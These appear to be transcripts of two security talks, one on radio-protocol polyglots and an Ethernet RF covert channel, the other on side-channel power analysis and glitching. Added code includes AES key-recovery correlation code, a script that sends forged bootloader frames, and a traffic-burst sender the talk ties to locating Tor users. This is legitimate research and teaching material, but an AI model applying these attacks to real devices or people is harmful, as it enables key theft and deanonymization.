amplitude breaks down under the Fourier transform, to represent this gap, this non-continuous shape, you need all kinds of sine waves. You need sine waves with much higher frequency than your band. And of course, when you do your actual Fourier transform or your fast Fourier transform, you get those boundary artifacts at all kinds of higher and lower frequencies. And of course, the Fourier transform tries to represent the shape of your strange, non-sine piece of the wave as carefully as it can. The same happens on the circuits if you're not using a filter. And that's why you're getting that spillover all over the place. So the amplitude trick is actually essential. It would be a lie to show PSK31 without it. So a neighbor by the name of Craig Hefner is here. And as I was describing this to him in Boston, he starts laughing. And he tells me that when he built a PSK31 decoder, he never paid attention to the phase. He just looked for that drop in amplitude. And so he taught me a trick. And I love when you drink with people who, when you describe a paper to them, immediately think of how to do what you're talking about, but by a completely different method that happens to also work. So his idea, which also works, is that you can drop the amplitude anyway during a one, even though it's not required. And so the two waveforms here are as viewed in Audacity. You'll note that the power envelopes are drastically different. So the top one I can visually read as PSK31: it's a bunch of zeros and then a one and then a zero and then a bunch of ones and then a zero at the end. The bottom one you cannot read visually. His interpreter will fail to see this because it sees everything as being a zero. But the traditional commercial receivers will interpret the lower message fine.
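And here is the same generator with the attenuation envelope bolted on, in the simplified always-attenuate form described above, where every symbol fades to zero at both edges. Incidentally, because the envelope now dips on every symbol, this is also roughly what the "unreadable" bottom waveform in Craig's example looks like: the amplitude no longer tells you where the ones and zeros are.

```python
# Filtered PSK31 generation: scale each symbol by attn[i] = sin(i*pi/length)
# so the waveform reaches zero amplitude exactly where a phase flip may occur.
import math, struct, wave

AUDIO_RATE = 48000
VOLUME = 0.25
DIVISOR = AUDIO_RATE // 1000
SYMLEN = int(AUDIO_RATE / 31.25)

def filtered_symbols(bits):
    samples, phase = [], 0
    for b in bits:
        if b == 0:
            phase ^= 1
        for i in range(SYMLEN):
            attn = math.sin(i * math.pi / SYMLEN)     # 0 .. 1 .. 0 over the symbol
            carrier = math.sin(math.pi * phase + 2 * math.pi * i / DIVISOR)
            samples.append(VOLUME * attn * carrier)
    return samples

def write_wav(path, samples):
    with wave.open(path, "wb") as w:
        w.setnchannels(1)
        w.setsampwidth(2)
        w.setframerate(AUDIO_RATE)
        w.writeframes(b"".join(struct.pack("<h", int(s * 32767)) for s in samples))

write_wav("filtered_psk31.wav", filtered_symbols([1, 0, 1, 1, 0, 0, 1, 0]))
```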
And this trick works beautifully. So here is another polyglot, quite unintended, due to Craig. And we're going to mark those tricks with cats, if you will. So here's another. So the next one we're going to do is a PSK31 and Morse code polyglot. If you listen carefully, it's dah-di-dah, dah-di-dah, di-dit, di-dit, di-di-dah, di-di-di-dah. This is my call sign in Morse code, but if you look deeper into it, and this is a spectrogram on the left, you'll see that the first dah-di-dah is the letter K in Morse code, and that upper dah actually contains the letter K as PSK31. So by encoding it this way, you can have a message that is valid as both PSK31 and as Morse code in the same duration that the Morse code message would take. The only expense here is that instead of doing like a simple carrier wave, I'm spreading it out a little bit and keeping it as PSK31 for clock recovery. And to do a real world implementation of this, you have to drop the PSK31 amplitude to be very low, but not actually to zero, because if you drop it to zero, then the receiver loses track and starts spewing noise onto the screen. So consider: this is a signal that is valid for two receiving circuits at once, and it's different things to those different circuits. The PSK receiver doesn't actually care about the amplitude, unless it's Craig's receiver, in which case it does. Whereas a Morse code receiver, the on-off keying receiver, does not care about phase. Yeah, it only cares about amplitude. You can do a similar thing to create a PSK31 and RTTY polyglot just by having two PSK31 transmissions and rapidly changing which one of them is the stronger of the two, because the RTTY receiver is trying to receive its bits with noise in the background. So it's perfectly okay with a little bit of energy being on each channel. All it cares about is which one is the more powerful one. And the PSK31 receiver, only caring about phase, allows for rapid changes in amplitude with at most one bit error. So that's one sneaky cat. And a single one bit in a string of zeros happens to be a space. So if you make sure that the error occurs on that bit, it looks like a space to the receiver, which is easy to read around. You can also do work with error correcting codes on these. So PSK31 does not have error correcting codes, but QPSK31 does. At DEF CON this past summer, Drapo and Dukes presented a version of JT65 in which they were steganographically encoding data within the error correcting bits. So you can do the same thing in QPSK31 or in many of these other protocols. There are some open questions in this though. If I send a very strong signal in which the bits are very clear and I'm intentionally flipping them, then your receiver should be able to tell that I'm doing that, because you'll visually see that it's a very good signal and you'll also see that the bit error rate is garbage. But to the best of my knowledge, no one's written a tool, at least for the amateur radio protocols, maybe not for the higher protocols either, that actually looks to see whether the error correcting bit was intentionally mis-transmitted. And such a tool would not be terribly hard to make. So this is a very important question. Whenever you have a protocol, whenever you have a modulation scheme, the first question should be: what does your noise sound like? What does your normal noise sound like? Does this sound like your normal noise? Because you sort of have this idea that your noise is uniform and random, but it's not.
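Since the talk notes that no such checker seems to exist, here is one crude way it could look. This is purely a sketch of the idea, with a made-up error model and hypothetical inputs (per-block SNR and corrected-bit counts coming from your own decoder): if the signal is strong but the error corrector keeps working overtime, someone may be flipping bits on purpose.

```python
# Sketch: flag blocks where the error-correction layer is working suspiciously
# hard given how clean the signal is. Inputs are hypothetical, produced by
# whatever decoder you are running: (snr_db, corrected_bits, total_bits).

def expected_error_rate(snr_db):
    # Toy model: a clean signal above ~10 dB SNR should need almost no
    # corrections. Replace with a real BER curve for the modulation in use.
    return 0.001 if snr_db >= 10 else 0.05

def suspicious_blocks(blocks, factor=10.0):
    flagged = []
    for idx, (snr_db, corrected, total) in enumerate(blocks):
        observed = corrected / float(total)
        if observed > factor * expected_error_rate(snr_db):
            flagged.append((idx, snr_db, observed))
    return flagged

if __name__ == "__main__":
    demo = [(18.0, 1, 1000), (19.0, 62, 1000), (6.0, 40, 1000)]
    print(suspicious_blocks(demo))   # the second block looks like deliberate flipping
```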
The fact that makes a packet-in-packet possible is that, for example in Zigbee or 802.11, your noise comes in short bursts and it kills a symbol or two, not the entire frame somehow. I mean, of course, if you turn on the microwave then it's a different story, but your naturally occurring noise comes in short bursts. Whenever you have a circuit, it's built for practical noise, that's how it probably evolved. But what if you start playing with that noise? What then? What can you hide there? So we're running low on time, but there's one thing that's just so cool we had to include it. So you've all seen this, like, crazy clip art with the Ethernet cable and the bits are just flying out of it and there are ones and zeros everywhere. Turns out that actually works. So we all know that data runs over Ethernet and we also know that you quite often control a piece of that data, but you don't usually control it very well when you're the attacker. For example, I might control a Tor hidden service that's running HTTP, and I control a server side script on that service, and the server side script, whatever data it puts out goes down to your machine through the Tor network. And I don't know where your machine is. I don't know exactly how to get there and I don't even really control the latency very well, but I do have pretty good options as to how fast I supply data to the proxy server. So what I can do is I can send you, like, a burst of data and then I can sort of back off for a bit and send nothing and then I can send some more and then I can come back. So sometimes you want to exfiltrate data from that. For example, if I suspect that someone in a particular area is accessing my hidden service, I might want to identify that person. So it would be really handy if I could turn his home network into a radio transmitter and then drive around with a receiver until I found it. So also, like, we've all done Ethernet wiring and we've all been a little bit cheap about it. And one of the cheap things that you can do is you can buy a bargain basement brand Ethernet switch. And the other thing that you can do is you can have, when you untwist the pairs to crimp them, you can untwist them a little bit early and it makes it so much easier to crimp them. So I made the mistake of doing this in my apartment. Yeah, if you think this is theoretical, it's not. Yeah. So I made the mistake of doing this in my apartment. Don't switch the slide until I'm ready. I made the mistake of doing this in my apartment and I'm connected into this apartment remotely by SSH and I'm looking at the waterfall. And I see a giant chunk of noise right on a frequency that I want to use. And then I move over to another virtual desktop on my Mac. And VNC on a Mac actually stops sending packets when you're not viewing the screen, or it sends like a quiet little idle tone or something. And then I move back, and from the waterfall I could see that the noise actually went away, almost to a very thin carrier wave, at exactly the time that I was looking away from the screen. As soon as I came back it became noisy again. I then go to the apartment. I'm sitting in front of the computer. I see that it's very narrow. I see that my interference has mostly gone away. I start to pirate a movie. Instantly there's a bunch of noise everywhere. So what we realized was that the interference was actually coming from the bad wiring and that you could transmit Morse code this way. We call this the Madeline protocol.
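A sketch of what keying that channel might look like from the sending side; the host and port are placeholders for a machine behind the badly crimped cable, and the timing constants are arbitrary.

```python
# Sketch of the "Madeline protocol": key Morse code by alternating large and
# small bursts of traffic toward a host on the leaky segment.
import socket, time

HOST, PORT = "192.0.2.10", 9999    # placeholder target on your own network
UNIT = 1.0                          # seconds per Morse unit; slow is fine here

def burst(duration):
    s = socket.create_connection((HOST, PORT))
    end = time.time() + duration
    chunk = b"\xAA" * 4096
    while time.time() < end:
        s.sendall(chunk)            # keep the wire busy, which shows up as RF noise
    s.close()

def send_morse(message):
    for ch in message:
        if ch == ".":
            burst(UNIT)             # dit: short burst
        elif ch == "-":
            burst(3 * UNIT)         # dah: long burst
        elif ch == " ":
            time.sleep(4 * UNIT)    # gap between letters or words
        time.sleep(UNIT)            # quiet gap between elements

send_morse("-.-  ")                 # e.g. the letter K
```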
I successfully sent Morse code from my apartment down the street, remotely, just by triggering large file transfers and then short ones. Well, crimp your cables. Just by sending a long pulse for a dah and a short pulse for a dit. You'll see, like, a couple of points in between where other users of the same network created similar artifacts. But it being less bandwidth, mine stands out. Their cables were probably better. Yeah. Oh, they were on Wi-Fi actually. So it was a shorter route to the switch. So you too can do this. Yeah. So the other cool thing about these protocols is that they're on shortwave, which means that you can go to a local store and buy a shortwave receiver. And I, having a license, can transmit a signal with a ton of power from the Northeast United States. This map shows roughly where the signal gets to on a bad day. On a good day it gets to Europe and South America and all sorts of other fun places. So at some point in the next month I'm going to start transmitting sort of fox hunt signals, properly identifying, without cryptography, and obeying all of the other rules. But you can receive these pretty much anywhere in North America, or in Europe if you're patient, or in South America. And you can record them and then you can try and find the hidden message in each signal. So in the current issue of PoC||GTFO you will find an article about the DEF CON wireless village CTF. But of course, to come to that CTF you had to come to DEF CON and then go to the wireless village and sit there. Yes, but this CTF comes to you. And so what are the conclusions? These are very simple protocols. But they use exactly the same machinery as the more complex protocols. They use the same kinds of modulation, phase shift keying, frequency shift keying, as the grown-up protocols. You can think of them as the levers and the blocks, as the simple mechanisms, as the gears that you start practicing with. And perhaps also sometimes build a huge pyramid with, if you've got enough patience and labor time. So the same parser differentials abound in those protocols. They should be understood. And then with more expensive equipment you might actually be able to bring them up the complexity slope to the more complicated protocols. And no longer are you limited to polyglots in just PDF or ZIP or GIF or JPEG or the other kinds of valid formats that the Journal of PoC||GTFO comes in. Now you can have digital radio polyglots which take advantage of both the PHY and the encoding, and sometimes even the error correction. So there is pwnage in the PHY. Go find it. Our talk is meant to just show you some very simple examples of where it can be found. But of course, the further you go into that forest, the more interesting it will become. Thank you kindly. As Dan Geer says, there's not enough time in the world, so thank you for yours. Goodbye. Thank you.
|
Ah Matryoshkas, who doesn't like these Russian nesting dolls? But why should the fun of chimeric nesting be limited to just application formats? It is possible to design PHY-layer digital modulation protocols that (1) are backward compatible with existing standards and (2) discretely contain additional information for reception by those who know the right tricks. When properly designed, these polyglot protocols look and sound much like the older protocols, causing an eavesdropping Eve to believe she has sniffed the contents of a transmission when in fact a second, hidden message is hitching a ride on the transmission. Mallory, on the other hand, may use these protocols-in-protocols to smuggle long Russian stories to all who will listen! This fine technical lecture by two neighborly gentlemen describes techniques for designing polyglot modulation protocols, as well as concrete examples of such protocols that are fit for use in international shortwave radio communication.
|
10.5446/32813 (DOI)
|
All right, we're good. So it'll take a second when I switch for doing the demo to mirror it. But thanks for sticking around before the coffee break for a second here. So I hope you find this interesting and learn a little bit about sort of more hardware hacking level of stuff. And in particular, I'll be talking about side channel power analysis and glitching. So very quickly, I'm going to review what side channel power analysis is. Previous presentations have gone over this in a lot more detail. So this is going to be the super abridged version of that sort of talk. I'm not going to go over every little detail of how the theory of it works. You can see some of my previous talks if you're interested in that. I'll give you two examples of where you can use side channel power analysis on real targets. And after that, I'll pretty briefly cover what glitching is. And sort of an example of doing glitching against a Raspberry Pi running embedded Linux. All right, so about me, right now I'm doing a PhD at Dalhousie, which is in Halifax, Canada. As part of that, I designed this open source project called ChipWhisperer. And it's gone through a few different iterations. And the most recent iteration is the one I'm talking about, ChipWhisperer Lite. And I've spun out a company to help commercialize that, but it's a completely open source project. So everything's open. It's a little like the talk before the previous one, saying, you know, it's one man writing crappy code. Very much the same to the point that I learned Python doing this project. So the early code is a lot sketchier than the later code. You can sort of see the progression. So, and I've talked about this a little bit about various black hats. Recon last year, there was sort of an earlier version. And I'll be at Defcon and black hat again this year. So if you're there, you can hunt me down. All right, so what is side channel power analysis? Very briefly, what you need to do this is you need some sort of device. So we have a crypto device. And that device in the center is doing, you know, whatever algorithm we're interested in, so be it AES, some sort of symmetric algorithm, or something else. We also have to have either input or output. It doesn't matter which. We don't need both. And we don't have to control it. But we have to be able to see what one of those pieces of data is or be able to determine it. So this is AES, for example, AES 128. We would have to know either, you know, the cypher, the plain text. And the AES is what I'll be using. It also has to be operating with the secret key loaded. So that's sort of one of the other critical things we'll see. So you can't use side channel power analysis if you have a hard drive sitting on a table that's not encrypting or decrypting anything. This won't work against that sort of target. So you know, if it's a self encrypting drive, if you can do these measurements well, the drive is encrypting and decrypting, it is a viable attack vector. So that's sort of the only caveat you have to understand with it. It's not just a magical attack against encryption. It's very specifically attack against implementations when they're doing specific work. So the super fast description of how it works is that if you look inside digital devices, inside a digital device you have something like a bus line. So these are, you know, the data bus lines. And the data bus lines are just long wires. These long wires you can sort of simulate or, you know, view them as just capacitors. 
There's a, the long wire has a capacitance to it, and to change the voltage on that capacitor takes physical power. So to change it from a zero to a one, it takes a tiny amount of charge. And if we look in the chip, if we have, so here I have two data lines. And those data lines always switch on the clock. And if two of the data lines switch from zero to one, it takes, you know, this, I have two data lines here switching up. And you can see there's sort of a spike of power if you can see it on the screen. And then later on, for example, the data lines switch low. So I'm only looking at power consumed from one of the power rails. They switch low so it doesn't take any power from the positive rail, so you don't see that spike. So the idea is that there's some linear relationship between power consumption and the number of bits set to one on the data bus. And this is real. It's not sort of like, oh, it kind of works, hopefully. This is a measurement I did on a small 8-bit microcontroller. And it's showing you, on the bottom, what they call Hamming weight. So this is the number of bits set to one. And so either no bits are set to one or all bits are set to one. And on this axis is the current sort of consumed by the device. It's a measurement related to the current, so it's not directly, you know, milliamps or something. But you can see there's a very beautiful linear relationship. Why this is useful to us is if we look at a lot of algorithms, so again going back to AES, it's a 128-bit key. So we can't, you know, guess the key any way we want. But what we could look at is we say, well, it operates on one byte at a time. And if we just concentrate on one little section of the algorithm, so if I just sort of draw a crude square rectangle around that section up there, what the power analysis will tell us is that we're going to look just at, say, this point in the algorithm. We're going to look at the data right at this output here. So if you can, oh, I don't think it's trying, sorry. There we go. This output there. So we're only looking at one byte of the key, one byte of the key, and the output of that one spot. And we could figure out, you know, based on the power analysis that there were four bits set when I put in a plain text of AB, hex AB. And the only way we get four bits set is if the key is a certain byte. In reality, we'll, of course, get a candidate number of possible bytes for that key. So we could send in another piece of plain text and say, well, we send this other byte of plain text. There are two bits set at that intermediate value. We know all of them, how the algorithm works, so we can narrow down what that byte of the key is. So the point is that we're doing this guess and check on a single byte of the key, and we just do it 16 times in a row. So it's just two to the eight guesses, 16 times. So it's very tractable and an easy amount. To do the measurement of the power, all you really need is something that, like an oscilloscope, or something that is capable of, you know, measuring the power. I have my own custom hardware to do this, but this is just, you know, an off-the-shelf USB scope. And I have a device that is running whatever the encryption example I'm interested in. So I just have a board that's a chip running, you know, some program using encryption. And that's really all that's involved in the attacks, what you require. So to help simplify this, this is what I had showed last year.
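To make the guess-and-check idea just described concrete, here is a bare-bones correlation attack on one key byte in Python with NumPy. It is the textbook first-round S-box model, not the ChipWhisperer implementation, and it assumes you already have aligned traces plus the matching plaintexts.

```python
# Bare-bones CPA on one AES key byte: guess a byte, predict the Hamming weight
# of the first-round S-box output, and see which guess correlates best with
# the measured power traces.
import numpy as np

def _gf_mul(a, b):                      # multiply in GF(2^8), AES polynomial 0x11b
    r = 0
    while b:
        if b & 1:
            r ^= a
        a <<= 1
        if a & 0x100:
            a ^= 0x11b
        b >>= 1
    return r

def _sbox_entry(x):                     # build the AES S-box instead of hardcoding it
    inv = next((y for y in range(1, 256) if _gf_mul(x, y) == 1), 0)
    s = inv
    for i in range(1, 5):               # affine transform: xor of four rotations + 0x63
        s ^= ((inv << i) | (inv >> (8 - i))) & 0xFF
    return s ^ 0x63

SBOX = np.array([_sbox_entry(x) for x in range(256)], dtype=np.uint8)
HW = np.array([bin(v).count("1") for v in range(256)])

def cpa_recover_byte(traces, plaintexts, byte_idx):
    """traces: (N, samples) float array; plaintexts: (N, 16) uint8 array."""
    t = traces - traces.mean(axis=0)
    best = (0, -1.0)
    for guess in range(256):
        hyp = HW[SBOX[plaintexts[:, byte_idx] ^ guess]].astype(float)
        hyp -= hyp.mean()
        num = hyp @ t
        den = np.sqrt((hyp @ hyp) * (t * t).sum(axis=0)) + 1e-12
        peak = np.max(np.abs(num / den))
        if peak > best[1]:
            best = (guess, peak)
    return best          # (most likely key byte, its correlation peak)
```

Run this once per byte index and you have the whole 16-byte key, which is exactly the "two to the eight guesses, 16 times" point made above.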
I did this chip whisperer project, so it's designed to be a combination of the hardware, which is replacing the oscilloscope, so doing the power measurement side, as well as a board for programming with, you know, if you want to analyze, say, an AES library, you can program it into the board and do the measurements there. You can, of course, target physical devices, and I'll show some examples of that. Last year it was in second place in the Hackaday Prize in 2014, and that version of the hardware was then sold as a security analysis tool. So again, all open source, the hardware and software. To make it even more accessible, so the problem with this is it was still a bit fiddly, a little bit more expensive, like $1,500. And we really need to push it to the point that all people know about this, that might have to design these products or look at the security of products. So I've done a Kickstarter for the chip whisperer light board, about $200 US in the Kickstarter, and it's doing almost the same thing. So it has a section of the board that is doing the, sort of, the target device. So this is the, it's an Atmel XMEGA. You program it with whatever library you want, and then there's a portion of the board that does stuff like the analog to digital converter. It has a high speed USB, it has an FPGA and all that stuff. So it's effectively designed to give you a tool to learn about the theory behind these attacks. The critical thing with side channel analysis is it's never going to be a script kiddie point and click attack. You have to understand how everything works about them to, you know, even hope to apply them. So this tool is designed to give you that sort of training. And of course, there's nothing special about it. You can just go back and build your own if you have an oscilloscope that works. The software works with anything. It will work with regular oscilloscopes, as that's what I used to use. All right, so let me give you an example of what this looks like in real life. This was the super fast talk, the super fast demo that I had done last night. And I'll sort of do the same thing just so you see what the waveforms look like. So if I run the capture tool, it's going to do that sending data to the device, record power, and see what the encryption is. Let me pull it over. Which way is it? So this is the tool. It's all written in Python. And it's very fiddly on this monitor here. And it's just, it can attach to various targets. So I'm going to be attacking AES on this little XMEGA board. So what it's doing is it's going to send encryption messages to the device and then record the power. So you can see the sort of traces bouncing around. That's as it's recording different messages. And you can view the AES 128 input and outputs just raw. So in this example, I just am testing the library. So it just sends a message, encrypts it, and that's it. What I can do, for example, to give you a more intuitive feel, is that if I set this to fixed, so if it's encrypting the same data repeatedly, you'll sort of see the waveform doesn't jump around quite as much. There's a bit of noise. But the peaks, if you look at the bottom down here, don't change nearly as much. And if I switch this back to encrypting random data, you can see those peaks jumping around a lot more. So it gives you a feeling there is a data dependency based just on what's being encrypted. All right. So what we're going to do is we're just going to capture like 50 traces.
So it just sends 50 messages to the device and encrypts them and monitors the power while it's doing that encryption. And I'll save test recon 2015. And there's no undo in this GUI. So I don't need undo. And in fact, you can't close a project and reopen a project without closing the whole thing, so it has lots of features like that. All right. And then the analysis side is a separate program. So the analyzer, previously, I mean, people have been doing this research for 15 to 20 years in the power analysis side alone. And you can use, you know, straight Python, you can use MATLAB scripts. You don't have to use this. It's a very simple file format. The idea of the GUI is just to sort of get you started and give you a feel for what the traces look like. So if I open that project, what we see is the waveform here. So that was the waveform I just captured. And the attack. So we have to know a little bit about the device to attack it. In this case, I know it's AES 128. And because it's on a microcontroller, there's certain power models we use. And I talked about that in previous presentations. So I'll skip that. And all it's going to do, it's doing the analysis. And the key in red is the correct encryption key. And it knows what the correct key is because I've told it what the correct key is. So you can see in this example, in 50 traces, it almost entirely recovered the key. There's one byte that maybe it needed a few more traces for. But it's very, very fast. Like that, you know, was a few minutes start to finish for the whole demo. One of the other questions people always ask is, well, how do you know where the encryption is happening? And the analysis itself gives you some of those answers. And so what this is, this is graphing the correlation between, it looks for that linear relationship. And this peak is at various points in time as it's executing instructions. So all I do is I say, I send you data; at some point between sending you data and getting data back, you're running the encryption algorithm and doing that operation I'm targeting. So I can compare, for example, this is recovering byte 4. If I look at recovering byte 5, what you'll sort of see is you notice that peak is marching on in time. And this is because this is an AES software implementation. So it's doing byte 5, byte 6, byte 7. And you can see the specific instance in time where that operation of interest is occurring. So it also gives you some information about the underlying process. All right. So there's that. That's what side channel analysis briefly looks like. So where could we use it? So here's two sort of demos I've done, or work I've done more recently. So this 802.15.4 standard was hoped to be a big protocol for the Internet of Things. It never really turned out as much. But there's a few things using it. The Nest thermometers use it as one of the interfaces, I believe. There's some wireless light bulbs that used it. It's used a bit for smart energy, sometimes for connecting networks in the home. And you might know it better by other names. So 802.15.4 is the lower layer protocol used by all of these. So all of the Zigbee ones people have probably heard about. But all of these protocols are built on top of 802.15.4. And if you want more details, by the way, about the attack, it's in this paper here that I sort of just put online. So this is the first time I've really talked about it. And what I'm doing is I have a 802.15.4 node.
And this 802.15.4 node, I'm using a development board here that's sold by, you know, a third party. And I'm targeting an 802.15.4 system on a chip. So it has a microcontroller and the radio all on board. And at the same time, I'm measuring the power using the shunt here on the board. So for this attack, I do physically need to have the device. You don't necessarily need to use the shunt. You can do stuff like a magnetic field probe, which doesn't require the soldering, but you still need to be close to the device. What's sort of interesting about this is, for example, a lot of targets, you know, a lot of central routers at some point will have a web-based interface as well as the 802.15.4. So the Nest thermometer, or I don't know if the thermometer does, but Nest Protect, I think one of the gateways has 15.4 on one side, your internal network on the other. So while you couldn't get access to the gateway, you may be able to get access to a device that the gateway is talking to. And so maybe you can use the device the gateway is talking to to then fuzz into the gateway to find vulnerabilities. So there is a lot of reason why you should be concerned if we can break these devices fairly easily and then spoof messages on the 802.15.4 network. So the 802.15.4 frame format looks something like this. And very briefly, when we're doing a secure message, the only stuff you really care about is, so the destination address we can set to a broadcast, so we can just sort of force a node to receive it. And any node that receives, you know, a valid looking message is going to try decoding it. And if we set this security stuff up, what that means is the device will try to decrypt the message. It will obviously throw it away as soon as it realizes it's invalid. But we can cause those operations we require to happen. So way back here, I said for side channel analysis, what we need is the ability to cause the device to do the encryption or decryption with data we know or control or something like that. So in this case, I'm sending the device a cipher text and it's going to decrypt it just because that's what it will do. It's going to verify the MAC, which will fail, and it will throw it away. But we don't care. We don't care about the verification. It's using AES in counter mode, which gives us one sort of problem: the real issue is that only a few of these bytes we actually control or that even vary. So there's just this frame counter that comes from the over the air message. The frame counter is four of the bytes of the input. So if we looked at the input, what this means is that these, or no, not these, these four bytes are variable and the rest are all fixed. So when you do that power analysis attack, I mentioned how it's doing this guess and check, there's no way to guess when you don't have any variation in the input message. You'll only be able to recover the keys where there is some change in what the input data is. The bytes where the input is fixed won't give you any information for this type of standard attack. There was previous work on AES counter mode showing how to push this into later rounds. So I sort of extended that a little to the specific mode used in 15.4. And what you end up with is that you basically are trying to push the attack into later rounds of AES. So AES itself, when we perform the attack, will recover four bytes of the key. As part of the AES algorithm, it's going to do the shift rows operation here.
So it effectively shifts around the keys, or shifts around the bytes, and then mixes them together. What this will mean is that if we looked at the second round of AES, we no longer have the case where only four of those bytes vary. A whole bunch of those bytes are going to vary, because that's sort of the design of AES. And we can now recover a lot more of the key material. And we have to push this to about the fourth round. And eventually we can recover the entire key from the AES algorithm, even though only four of those bytes vary at the input. So it's also not always the case that you can just look at it and say, oh, it's safe because, you know, only a few bytes change. There's a lot of tricks like this you can do. The second part of the attack is looking at the 15.4 system on a chip. It has a hardware AES peripheral. So the question is, can we attack that with side channel analysis? Does it leak? In this case, the answer is yes, it does, basically. So this is showing what's known as the guessing entropy. If the entropy goes to zero, we know the key with absolute certainty. So you can see the entropy is going down towards zero. Basically, if you can send the device, you know, 10 to 20,000 messages, you can recover the key. And for the 15.4 node, that doesn't take very long. You're just firing messages at it. The device is decrypting them. The verification fails and that throws it away. It never tells the higher layer. And eventually we can get the key, and then send it a message, you know, as if it was properly encrypted, or send a message from the device encrypted with the key for whatever that link is. That's example one. Example two is an AES 256 boot loader. And I sort of pulled this because if you look at app notes from a lot of silicon vendors, what they have is they'll say, well, here's an AES boot loader. So Atmel has one. I can't even read that one, Freescale. And whatever this one is has one as well. And there's a few other ones. And they're all more or less the same. As a note, if you want more details, there's sort of a tutorial I wrote on this and a recent paper that was just published on this attack. And very briefly, all of these protocols vaguely use this idea where you get the updated microcontroller firmware. They split it into, you know, whatever size blocks they're using. They prepend some fixed number of bytes in the front. So these fixed bytes effectively form the signature. And the idea being it's just going to decrypt every block and check those fixed, those four bytes are correct. This is to ensure that it's, you know, supposed to be an update file. So this is kind of what they use. You know, there's some variations, but it makes a good generic statement. So what's interesting to us, and it's used in a CBC mode, is that the data, if we just send the device a block like this, you know, of encrypted data, we put the CRC on it, we put the header on it, it's going to decrypt it and check the signature. The signature will fail and it'll throw it away. But again, we don't care about that. We care that we were able to get the device to decrypt it properly. And so this is great, because we can do a side channel attack now, because what we have is we have this situation. We have the input cipher texts here, the AES-256 decryption in the center, and after the decryption, it's applying the IV. So we don't even care what the IV is, in fact, at least initially. We have everything we need to do the entire side channel analysis.
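Sending those garbage blocks is simple to script. The sketch below builds frames in the general shape described (a header, one ciphertext block, a CRC) and pushes them at a serial port; the header byte, the CRC flavour (CRC-16/CCITT here) and the serial settings are assumptions that would have to be matched against whatever the target's app note actually specifies.

```python
# Sketch: fire "update" frames at a bootloader of the style described above so
# that it decrypts attacker-chosen ciphertext while power traces are recorded.
import os, serial   # pyserial

def crc16_ccitt(data, crc=0xFFFF):
    for b in data:
        crc ^= b << 8
        for _ in range(8):
            crc = ((crc << 1) ^ 0x1021) if (crc & 0x8000) else (crc << 1)
            crc &= 0xFFFF
    return crc

def make_frame(ciphertext16):
    assert len(ciphertext16) == 16
    header = b"\x00"                      # placeholder start-of-frame marker
    crc = crc16_ccitt(ciphertext16)
    return header + ciphertext16 + bytes([crc >> 8, crc & 0xFF])

def send_garbage_frames(port="/dev/ttyUSB0", count=200):
    with serial.Serial(port, 38400, timeout=0.2) as ser:
        for _ in range(count):
            ser.write(make_frame(os.urandom(16)))   # random "ciphertext" block
            ser.read(2)                             # discard whatever it answers
```

A hundred or two of these frames, captured alongside the power measurements, is the "100 to 200 encryption attempts" budget mentioned next.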
The only caveat, because it's AES-256, it's a tiny bit more difficult in that you have to do the attack twice. So you'll do it first on the first round of the decryption or, you know, last round of the encryption, whichever way you want to look at it, and you'll recover all of these. So you'll recover the information here to figure out what the final round key or the first round via decryption key is. Once you have that key, you can then attack the next round and recover the full 32-byte key for AES-256. And you know, there's always tricks. As I say, it's never just a push-button attack with a side channel analysis. So in this case, one of the problems might be that the AES implementation actually has a timing attack in it as well. And so things become unsynchronized. So we have the first round going here. At some point, there's a time-dependent operation. So what you can see is that if I overlay, I think, about 100 power traces, up until that point, they all look, you know, this amplitude differs, but there's a very nice sort of outline. Beyond that point, things look crazy. It's not synchronized at all. And that's because there is some time-dependent operation where the time depends on the data, giving us the timing attack, which we ignore. So all we do is, you know, we can resynchronize. Basically, you try shifting each trace a little bit, a few points to figure out the synchronization again. And then you're good. And you can do the side channel power analysis attack on the next round. And what this looks like, so there's two success rates here. A success rate of one means I 100% of the time recover the key with a certain number of encryption attempts. So for the first 16 bytes of the key, you can see that in about 60 traces, it almost, with 100% certainty, is able to recover the encryption key. It's a very wavy line, I know, but it should be about straight. And it takes a few more to recover the last 16 bytes of the key. But we're still talking about, you know, 100 to maybe 200 encryption attempts. And each attempt is me just sending that garbage packet to the device. So this does not take very long at all to do that type of attack. All right. So with that interest, how can you get started? Really, all you need to get started is a few things. You need a simple target device. So do not try side channel analysis for the first time on a Raspberry Pi or anything like that. You want a, you know, 8-bit microcontroller ideally. So an AVR dev board, like I showed the one earlier, the Arduino Uno, again, not the ARM stuff, or a PIC controller. And you just need some way to measure the power on it. So a scope with a USB API. So I like the PicoScope models. A lot of bench scopes have it. The only thing to be wary of is the, you can get really cheap off-brand scopes off eBay. A lot of the time the USB interface is poor. So it comes with software and that's all it works with. You'll spend a lot of time reverse engineering it. Or of course there's one of the projects I have. So the chip whisper or chip whisper light, which are somewhat commercial wherever it was back here. Or you can build one yourself. All the designs are open. All the PCBs are available. All right. So that's the side channel stuff. What about glitching? So what is glitching? It's the first question. Glitching is really when we make the device do something that it is not supposed to be doing. 
So in this case what we might have is, I'm doing an example of glitching where I just have a simple loop and I just go through the loop and it is doing some different things. So it's just doing these additions. And I can insert glitches using just a short on the power rail. And the short is just an electronic switch shorting the power rail. And you can do this against an AVR microcontroller. You can do it against an Android device. So this is a smartphone. Or even something like a Raspberry Pi running Linux. And what you end up with, so again all I'm doing is I'm shorting the VCC power rail here. And what I end up with is a nice waveform like this. So when I engage the short it drops the power for a very controlled amount of time and then generates a large ringing spike. And this will cause incorrect instructions to be executed. So in my test all I'm looking for is wrong numbers being calculated. You can use this to calculate incorrect encryption information. You can use it to bypass stuff like a password check or anything else. And again, you can get started really easily. Just use a small target. You load some simple code like I showed you, like that for loop. And you just start trying different parameter sizes. So again, the chip whisperer light supports the same idea, with that electronic switch all integrated on the board. So hopefully this really quick presentation has given you some pretty interesting sort of thoughts about why side channel power analysis is fun, and it's not that difficult even though it might seem like a really complicated thing. Just with a little bit of experimentation on your own you can probably get started in it. So at that point, if you want to contact me there's various ways. And everything's posted on chipwhisperer.com, GitHub and stuff like that. So questions, if there's time? One question? No questions?
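The parameter sweep mentioned above might look something like this in practice. The two hardware hooks are placeholders for whatever actually drives the crowbar switch (a ChipWhisperer, an FPGA board, even a pulse generator); reading the target's printed result back over serial is the part that stays the same.

```python
# Sketch of a glitch-parameter sweep: vary pulse width and offset, fire the
# VCC short, and flag any run where the target's loop prints the wrong sum.
import itertools, serial   # pyserial

EXPECTED = b"2500\n"        # whatever the untouched loop normally prints

def set_glitch(width_ns, offset_ns):
    raise NotImplementedError("program your glitch hardware here")

def arm_glitch():
    raise NotImplementedError("arm and trigger the VCC short here")

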